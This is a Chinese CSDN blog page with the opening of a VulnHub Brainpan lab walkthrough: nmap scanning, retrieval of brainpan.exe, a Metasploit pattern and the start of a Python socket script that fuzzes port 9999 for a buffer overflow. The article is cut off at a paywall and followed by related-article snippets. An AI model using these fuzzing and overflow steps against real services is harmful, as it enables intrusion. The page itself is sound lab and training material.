vulnhub-Brainpan (考点:windows exe和linux elf下的两种缓冲区溢出)

最新推荐文章于 2024-04-08 07:30:00 发布
最新推荐文章于 2024-04-08 07:30:00 发布
阅读量2.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105652183
版权

这个靶机前面考exe文件的缓冲区溢出,后面的提权方法还有对linux-elf文件的缓冲区溢出。可以熟悉ollydbg &immunitydebugger & gdb 几个常用调试工具和方法

https://www.vulnhub.com/entry/brainpan-1,51/
安装为nat网络
arp-scan -l。比平常多出来的那个就是靶机了

nmap

C:\root> nmap -A 192.168.189.188
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 22:11 EDT
Nmap scan report for 192.168.189.188
Host is up (0.00063s latency).                                                                                                                                 
Not shown: 998 closed ports                                                                                                                                    
PORT      STATE SERVICE VERSION                                                                                                                                
9999/tcp  open  abyss?                                                                                                                                         
| fingerprint-strings:                                                                                                                                         
|   NULL:                                                                                                                                                      
|     _| _|                                                                                                                                                    
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|                                                                                                        
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-title: Site doesn't have a title (text/html).

就俩
带入端口号进网页,找到http://192.168.189.188:10000 这里面有图。
dirbuster扫。

在这里插入图片描述
在这里插入图片描述
发现bin目录下有个exe。下载下来
看看啥玩意。32位的

C:\root\Downloads> file brainpan.exe 
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

wine它看看是啥,结果我的考试官方版kali2020没有自带wine?要啥没啥??

apt-get insatll wine
因为是32位的exe,如果你是64位机,还得根据提示安装32位的wine
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

运行
随便输几个A,回答拒绝进入,再输入N多A,没有反应了或者报错。就是缓冲区溢出考点啊

这次似乎要输很多A才没反应报错

用工具测崩溃点,加到1000

C:\root\Desktop> /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

网上有很多脚本,自己写或随便改一个。脚本发送,探测。这步我是在本机的kali打开brainpan的,所以ip地址是kaili的

import sys,socket

victim = '192.168.xxx.xxx'
port = 9999
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  print "[-] Connecting to " + str(victim)
最低0.47元/天 解锁文章
冬萍子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub-IMF 靶机的上传和linux缓冲区溢出
冬萍子癸水
04-22 528
这篇文章暂时只记录上传和linux bof。。。。留我自己学习和记录 上传这里检测的挺严的。。。system passthru这些函数都能检测,即便是改文件为图片,加gif89在开头都没用。。。 这个时候用weevely很方便,加密了php函数代码。 创建go.php 然后密码是666.再把这个php文件改为gif文件 weevely generate 666 go.php mv go.ph...
CentOS 安装软件出现错误:/lib/ld-linux.so.2: bad ELF interpreter 解决
09-15
主要介绍了CentOS 安装软件出现错误:/lib/ld-linux.so.2: bad ELF interpreter 解决的相关资料,需要的朋友可以参考下
vulnhub靶机Brainpan
m0_73248913的博客
09-11 170
vulnhub靶机
bin、hex、exeelf文件类型到底有何区别?如何解读hex文件和elf文件?...相关内容都在这里!
最新发布
车载系统攻城狮
04-08 1422
详细的解释常见的bin、hex、elf等文件格式,分享bin和hex的互转工具,详细解读readelf的用法等等内容!!开发必备基础知识!!
17-VulnHub-Brainpan 1
尼德霍格007
08-12 812
17-VulnHub-brainpan 靶机地址:https://www.vulnhub.com/entry/brainpan-1,51/ 目标:得到root权限&找到四个flag.txt 作者:尼德霍格007 时间:2021-8-11 注意:此次渗透在VMware虚拟机中演示,kali机IP地址为192.168.21.128。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 nmap扫描网段 nmap -sP 192.168.21.0/24 扫描到靶机
VulnHub靶场笔记 - Brainpan(OSCP推荐靶场)
m0_62652276的博客
01-02 985
首先,在main函数中,buf可以接收的大小为1000,但此处strcpy()函数将source(即buf)拷贝到Destination中,但Destination的大小为520,说明可以进行溢出。打开WinDbg,选择“运行可执行程序”,选择brainpain.exe,然后在命令框中输入g,开始运行。重启WinDbg中的程序,g运行;不过,上述代码中,需要将单引号和双引号互换,可以在记事本中借助中间字符完成这个操作。重启WinDbg中的程序,g运行,然后在Kali中执行exp.py。
红队打靶:Brainpan打靶思路详解(vulnhub
Bossfrank的博客
07-13 618
本文是vulnhub靶机brainpan的详细打靶过程。涉及到的知识点包括strings命令、ImmunityDebugger的基本操作、缓冲区溢出漏洞、ret2shellcode、sudo提权等。理解构造溢出的全局思路是关键,操作过程中还有许多有关编码免杀绕过、内存小端显示等细节问题需要理解。
vmlinux-to-elf:通过提取内核符号表(kallsyms)从原始内核中恢复可完全分析的.ELF的工具
03-21
该工具允许从vmlinux / vmlinuz / bzImage / zImage内核映像(原始二进制Blob或已存在但已剥离的.ELF文件)中获取具有可恢复功能和可变符号的完全可分析的.ELF文件。 为此,它将在内核中扫描内核符号表( ),这是...
Detect-It-Easy:确定WindowsLinux和MacOS的文件类型的程序
05-13
“ DIE”是一个跨平台的应用程序,除了Windows版本外,还有适用于Linux和Mac OS的版本。 许多此类程序(PEID,PE工具)都允许使用第三方签名。 不幸的是,这些签名仅按预设掩码扫描字节,并且无法指定其他参数。 ...
gcc-linaro-aarch64-none-elf-4.8-2013.11_linux.tar.xz
07-22
gcc-linaro-aarch64-none-elf-4.8-2013.11_linux
XELFViewer:适用于WindowsLinux和MacOS的ELF文件查看器
03-28
适用于WindowsLinux和MacOS的ELF文件查看器/编辑器。 如何在Linux上构建 安装Qt 5.15.2: : 克隆项目:git clone --recursive 编辑build_lin64.bat(检查QT_PATH变量) 运行build_lin64.bat 如何在OSX上构建 ...
BrainPan1:Desarrrollo de la CTF BrainPan1
02-10
脑盘1 Desarrrollo del CTF BrainPan 1.下载: ://www.vulnhub.com/entry/brainpan-1,51/ Escaneo de Puertos root@kali:~# nmap --disable-arp-ping -n -P0 -p- -T5 -O -sV 192.168.78.134 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-09 16:40 EST Nmap scan report for 192.168.78.134 Host is up (0.00096s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 9999/tcp open abyss? 10000/tcp
针对ELF文件缓冲区溢出漏洞的检测技术
07-03
文章介绍了缓冲区溢出漏洞现状,提出了一种针对ELF文件格式文件潜在缓冲区溢出漏洞的检测技术
libvlc-armv8
12-25
支持 armv8 cpu,属于高端机型的,如不需要,自己有v7的
No.17-VulnHub-Brainpan: 1-Walkthrough渗透学习
qq_34801745的博客
01-14 1592
** VulnHub-Brainpan: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 靶机难度:中级(CTF) 靶机发布日期:2015年12月14日 靶机描述:用于荷兰非正式黑客聚会的小型VM,称为Fristileaks。 打算在几个小时内打破,而无需调试器,逆向工程等。 目标:得到root权限&a...
20221年1月31日-NO17-Vulnhub-Brainpan渗透学习(未完)
AnonyMousIT的博客
02-01 271
20221年1月31日-NO17-Vulnhub-Brainpan渗透学习(未完) 一、简介 二、信息收集 查看开放的端口 看到开放着9999和10000端口 首先尝试访问9999端口 没有密码,登录失败 只能从10000端口, 从扫描的信息可以看到,10000端口开着http服务 没有发现什么有价值的线索,然后对其进行目录爆破 发现bin目录,访问 bin,,目录下有一个 brainpan.exe 文件 将其下载到本地,并检查 发现这是一个 32位的执行文件,将其复制到windows机器上分
缓冲区溢出初探之一
weixin_34308389的博客
08-14 387
业余时间学习了buffer overflow ,简单记录一下操作过程。 文件下载地址:https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0 1.模糊测试 目的:发送一定量的数据导致程序崩溃。 #!/usr/share/python import socket,sys s=socket.socket...
ImmunityDebugger 学习
weixin_30865427的博客
03-12 698
Immunity Debugger软件专门用于加速漏洞利用程序的开发,辅助漏洞挖掘以 及恶意软件分析。它具备一个完整的图形用户界面,同时还配备了迄今为止最为 强的python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融 合于一体,它还附带了一套高度可定制的纯python图形算法,可用于帮助我们绘 制出直观的函数体控制流以及函数中的各个基本块。 ...
ffmpeg函数介绍
Balder~专栏
04-14 6826
本文对在使用ffmpeg进行音视频编解码时使用到的一些函数做一个简单介绍,我当前使用的ffmpeg版本为:0.8.5,因为本人发现在不同的版本中,有些函数名称会有点小改动,所以在此有必要说明下ffmpeg的版本号。 ffmpeg本人也是刚接触,本文将采用累加的方法逐个介绍我使用到的函数,如有不妥之处,还望谅解!   头文件引入方法: extern "C" { #include
arm-linux-ld指令详细讲解.doc
07-13
arm-linux-ld指令详细讲解.docarm-linux-ld指令详细讲解.docarm-linux-ld指令详细讲解.docarm-linux-ld指令详细讲解.docarm-linux-ld指令详细讲解.docarm-linux-ld指令详细讲解.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值